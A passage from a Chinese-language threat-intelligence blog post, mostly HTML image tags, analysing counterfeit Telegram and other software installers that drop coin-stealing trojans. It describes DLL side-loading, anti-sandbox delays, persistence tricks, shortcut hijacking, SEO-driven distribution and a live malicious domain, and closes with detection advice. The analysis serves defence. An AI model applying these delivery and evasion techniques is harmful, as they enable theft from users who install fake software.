A.jpg</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2111111111111111" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=fa544eb3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzC1DTyDWsGRtM7meveEyL7YXVXvvOXwpiaTcficrIStmWooePdZL1g2RQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><br/></p><p><br/></p><p><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.275" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8bcba345&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzZOsQlhxAAG3Azz6ia9w5biccXw9taaPyuRjjXfZeUAaic965M98CohPZA%2F640%3Fwx_fmt%3Dpng"/><br/></p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">压缩文件下载到本地后，安装程序解压出被分割的恶意loader dll文件，本地拼接后白加黑将loader运行起来，再解密并动态加载之前释放出的加密的恶意动态链接库。</p><p><br/></p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">木马运行后通过添加防火墙规则、复制多个自身、添加计划任务等手段进行权限维持。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.20462962962962963" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=391b4503&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzbCgCw9OgIxHfcia1iaMRr9DlWGRoucMrMK2HbZ8E1EZ10d9KIWZn2Xiag%2F640%3Fwx_fmt%3Dpng"/></p><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"></figcaption>并且该恶意客户端采用了大量的反沙箱设置，整个安装过程就长达五分钟。</figure></section><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.674074074074074" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=74385f60&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzUInthNXxGENH0thSbaRFy3nGhJYbGAbw0n5Vthn15y5W2Cib8qic8fKQ%2F640%3Fwx_fmt%3Dpng"/></figure></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">部分木马具有 “牺牲部分上线率来提升存活率” 的思想。以下案例中的恶意客户端在用户安装完毕后，并不会完成木马的上线工作。而是将用户安装后的telegram的快捷方式修改为木马上线的命令行，用户在第一次运行假冒telegram的时候才会将恶意木马解压运行起来。<img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.29074074074074074" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=2eeff1ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzRHRR22RenTaERDv9p8CS6m9DPiaALW7zBHuzia9jDBoFoNgdFvpa0riaw%2F640%3Fwx_fmt%3Dpng"/></p></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">木马多样性趋势。最初在了解范围内的木马基本无外乎 Cobalt Strike、大灰狼 这些传统远控（病毒特征码FatalRat、Zegost这些），后来有遇到过之前没有见过的websocket协议木马。<img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.38055555555555554" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d9fab9ec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzNa7SJQBEtvy0b8I4OuvKDRq5ZPAVAibLYrP5vFdibVGLhGqQW0jrVibOw%2F640%3Fwx_fmt%3Dpng"/></p></section></li></ol><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>攻击者目的</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">目前该攻击方式最常见的攻击目的即替换受害者剪贴板中的钱包地址实现盗币，但是在日常分析和其他分析报道中也能看到其他目的的攻击者。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.41203703703703703" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=cc207ec9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzVicIxPEtkrMyExC1KvYaUibEdv5sLOJUqkj2P4F2NQAV9UpXLNHYKUog%2F640%3Fwx_fmt%3Dpng"/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>其他信息</h2><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>安全厂商报道<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">目前已有多家国内安全厂商进行过报道，媒体类型以微信公众号为主。前段时间ESET也发表了一篇较为详尽的文章来介绍 “针对东南亚和东亚的虚假安装程序” 攻击事件，其中最有代表性的即为假冒telegram。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5601851851851852" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=60d63b2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzcsS5LUl6Irq1PH4mJCoTQN6c4wjiceGsdQlkNLXMeCq7sJP4vhdLZfQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6018518518518519" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=526fec68&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzs0R1SicQfrqxxNvxKmt3prR41MpoFZgBWG9uvr9FhQ0QJsVOVpUw4RA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">原文地址：<a href="https://www.welivesecurity.com/2023/02/16/these-arent-apps-youre-looking-for-fake-installers/" target="_blank">https://www.welivesecurity.com/2023/02/16/these-arent-apps-youre-looking-for-fake-installers/</a></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>相似攻击手法的其他软件<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">除telegram外，确实还存在其他多种假冒软件的攻击，如ESET文中提到的chrome、Firefox浏览器、WhatsApp、SKYPE、搜狗拼音输入法、Electrum钱包等等。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6342592592592593" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=808bfd3b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzBjeLHjhPyt1HDVdW4blwamyxNXibib2uFvib10CT4Qiaj7zicgTuicBYLYZg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">WhatsApp</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6388888888888888" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=df2d85f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzF4yDoTu4Jqr57vBTEV6eQdzxjzmqvIK3ydD36mL5elF29cxU4NX4EQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5398148148148149" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c79554a9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz4sqQnKt6dcgAIMiaKtotOuicsdd68n83us5tLTBW5OX5vuPJPC3eRWfg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">chrome</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5953703703703703" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d126d4d7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz3tycjWp7d7EutbSNKXxeURUwMkJPk0La06qaaIfXReiaqkgzlgiaIzQw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">Line</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5888888888888889" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8f4f42a9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzZvKLZnbcd333Huome9Bwl8A2vawVWZlhmXQ7eAQH1wY652xQymMOew%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">Electrum</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6138888888888889" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=ad2a310a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTz6ZIfQlIgTBB1QTKiaGicOvoiagn5lAx7T1kc0JerKGRiarh07HVt6Ucupw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">SKYPE</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6594134342478714" data-s="300,640" style="" data-type="png" data-w="1057" src="https://wechat2rss.xlab.app/img-proxy/?k=3f012d28&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzYH3TRQlhkvWiaMXRve9norS0SF7qNTXAD6Dyo0RBTiaAG3uKt4v2WN3w%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/><mpchecktext><br/></mpchecktext></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5407407407407407" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=88c939c0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzzgmr9hRhKm4YrLEwLrlUEq9lYD7GIYEWPVibCXpmVLnOclwf2VlcRwQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.42314814814814816" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=57221357&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzgufBGDO6XSZ3hhMX8762u6eaibbjib5Cq7bibtZ9zKSEPdNLfvTE4Hs2Q%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5675925925925925" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=104bbc5b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzk9mxfMGNggIw4iaCT8Lcr52WrBNEs628BgJss2euCTZiavbC4YqenMjA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">另外除上面描述的软件之外，也有其他IT类软件的攻击痕迹，例如使用 “navicat汉化版” 关键字推广的ytb频道。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5509259259259259" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=75a43c0b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzY6FZNSoz1NHKicQt7RHryME0ZNCFhXvZ67uZugTUgcQyQSIz7BluHWg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">目前该域名已经被cloudflare拦截</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.46111111111111114" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=1f634459&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzoPMu7VV8JVZa18oFXyhz9PuMGN9XiazicFyxF5h2MXjicsBHLPia1mYySQ%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>官方的拉黑机制<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">虽然攻击者所使用的基础设施的反应相对迟钝，但其实也是有所动作的。</p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>chrome的钓鱼网页拦截<span style="display: none;"></span></h4><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3888888888888889" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=27a153f9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzJUxeG5j5HNzART7447W8dkibpEtBL1VIowicOAxP45OwGYQNRMjTh5vQ%2F640%3Fwx_fmt%3Dpng"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>Youtube频道的封禁措施<span style="display: none;"></span></h4><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4981481481481482" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a9d138aa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzlHv0G1v87kzCK6icLPTan1KJhmE54Q6LjBQUQVxHgRK6v8iaiaxw2XoCQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/><mpchecktext><br/></mpchecktext></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.28055555555555556" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8855896c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzQS2CngWj4eCicpS7UyuOKGR86PYq7s8PHSwP73JMjWqDAMibiae4Vp18Q%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">部分之前存在过的恶意YouTube频道已经404，不确定是官方的处置措施还是攻击者更换了阵地。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4981481481481482" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=1f195e11&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzeiaJBLELQungv9aLia2BAVOTMFeCklx0QLtlx63B2HIQYYvOicgEgqMNg%2F640%3Fwx_fmt%3Dpng"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>Google文档的跳转声明</h4><p>似乎并非所有<br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2212962962962963" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=2bc8ae50&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzsCMaA1cVc2UgnR3pfN3E3KOlEfW18VnMmVDH25RnoI5S1RkiczX9UMw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/><mpchecktext><br/></mpchecktext></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2740740740740741" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=ffa0c75f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzDY9Hgxibv0PHXyNOOZ91euVVAaQRH82RJmfjXYoxDl8TNu8xib5ub3TQ%2F640%3Fwx_fmt%3Dpng"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;"><span style="display: none;"></span>被DMCA的域名<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">搜索时可以看到页面底部有时会显示有些搜索结果是被DMCA移除掉的</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5407407407407407" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=7b923f33&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzqMFv9MeXuwqgpqiacfGCG2bwSpkibprKHSNC646sPcyoFTCJiaU3cqZ8A%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是不能确定这些域名是被官方移除掉了，还是被用户举报的，抑或是竞争对手干的。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.562037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=ec331a6a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzh8BgMVXhdq0b224plJXLKKjYZCyzURfChZvUdeMwZefqBlqQtd4TPg%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>攻击者之间的竞争<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">比较有趣的是，在一次分析当中，我们发现攻击者会修改用户的hosts文件，屏蔽掉部分竞争对手的假冒官网域名，以此来保证自己的 &#34;权限独享&#34;。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.0898148148148148" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=fa89f956&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzytElqm9dOW05I8DDtYwa9IaAricia50077icenUHo0CoE7cGUSWD7SmNA%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>假冒telegram的产业链<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">“盗币” telegram的开发已经成为公开的黑灰项目，时常能够见到该 &#34;项目&#34; 的广告。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7166666666666667" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8bc9bc1e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzmXqokESgod9edEMDTa4nQMqibREGsGjDYhqhfliaicwaygjS8u63u2kaA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7185185185185186" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=584fe0a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzk7ZHb4TPBSWOMzCOYwTiaHvibnmLZMlBkTJRljJpb09KsukAGWt5UzPQ%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>攻击者的推广关键字<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">一次分析过程中，意外发现了攻击者用于统计访问的关键字，通过关键字可以看到攻击者目标人群。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRoh1cJ9oEONNca6ibN1Dc5pXKfKSHZhjUZZyvIQn5eBns3j4DoP0SlcRg4UE8Gibvicayy3aGAyw20JgqJ8xXXvDmA/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><a href="https://ia.51.la/go1?id=21515153&amp;rt=1676951579692&amp;rl=2048*1152&amp;lang=zh-CN&amp;ct=unknow&amp;pf=1&amp;ins=0&amp;vd=3&amp;ce=1&amp;" target="_blank">https://ia.51.la/go1?id=21515153&amp;rt=1676951579692&amp;rl=2048*1152&amp;lang=zh-CN&amp;ct=unknow&amp;pf=1&amp;ins=0&amp;vd=3&amp;ce=1&amp;</a><span style="color: #e6c07b;line-height: 26px;">cd</span>=24&amp;ds=全新telegram中文汉化版已上线，其中包括telegra&amp;ing=3&amp;ekc=&amp;sid=1676951478109&amp;tt=Telegram Telegram中文版&amp;kw=telegram, 电报telegram, telegram中文, telegram汉化, telegram中文版, telegram下载, telegram中文版安卓, telegram中文版ios&amp;cu=<a href="https://tenetgamg.top/&amp;pu=https://www.youtube.com/" target="_blank">https://tenetgamg.top/&amp;pu=https://www.youtube.com/</a><br/></code></pre><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">关键字：telegram, 电报telegram, telegram中文, telegram汉化, telegram中文版, telegram下载, telegram中文版安卓, telegram中文版ios</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>攻击者有趣的话术<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">不知道是否是刻意利用目标受害者的民族自豪感，攻击者在假冒安卓客户端下载处，刻意设置了一个 ”华为专用版“ 下载入口，其实背后对应的下载链接与 ”普通假冒安卓版“ 是一样的。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.49537037037037035" data-w="1080" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=bd91a32c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzPtIFhDB9ZibKW0SicYj5ezZN8xFQiaic4h1icMlFIhf49DlohUDPzpQOSgg%2F640%3Fwx_fmt%3Dpng"/><br/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><br/></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>针对已中招用户的一个筛查思路<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">大多数假冒的Windows客户端在安装时基本都会在 ”程序和功能“ 注册表项进行新软件注册，假冒telegram客户端程序也有自己的特征，可以在EDR、准入等会统计客户端软件列表信息的地方以排查telegram关键字、排查特殊符号等思路来筛查已经安装的用户。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.030555555555555555" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=bd235c01&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1hKL5PoXpRDAbicibLpgicFTzteFqGziaQcxSmFsnzhFn5buorr5KcYq7132pkmnMAXR0rvRGwyFib1ew%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.040740740740740744" data-s="300,640" style="" data-type="png" data-w="1080" 